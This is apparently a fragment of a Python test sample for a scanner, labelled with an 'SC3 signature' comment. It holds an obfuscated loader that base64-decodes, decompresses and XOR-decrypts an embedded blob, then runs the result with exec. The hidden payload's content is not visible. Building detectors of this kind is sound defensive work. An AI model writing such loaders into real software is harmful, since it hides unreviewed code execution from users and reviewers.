/7JbmYfCJkBH4+//IEw3V/CuD7v+B2f4pR+O51JXFfxwZjHViFq+w3+kpwal7piDUYeQsiUaHf6CuaWQl1HTToxX28Ajx0wcGvlkHBvcOLqMwlzhm19gRqzy+NxNIPrgYZrM52DHhzViS5V5P51mkWB0ogG//6KsVSMWvd4y9eTck0"
_K = bytes.fromhex("306e0965f9e65a5d3ccbe8dd")

def _xor(buf, k):
    return bytes(b ^ k[i % len(k)] for i, b in enumerate(buf))

def _decode():
    inner = zlib.decompress(base64.b64decode(_OUTER))
    return _xor(base64.b64decode(inner), _K).decode("utf-8")

if __name__ == "__main__":
    # SC3 signature: base64.b64decode(...) -> exec / compile near by
    exec(compile(_decode(), "<runtime>", "exec"), {})
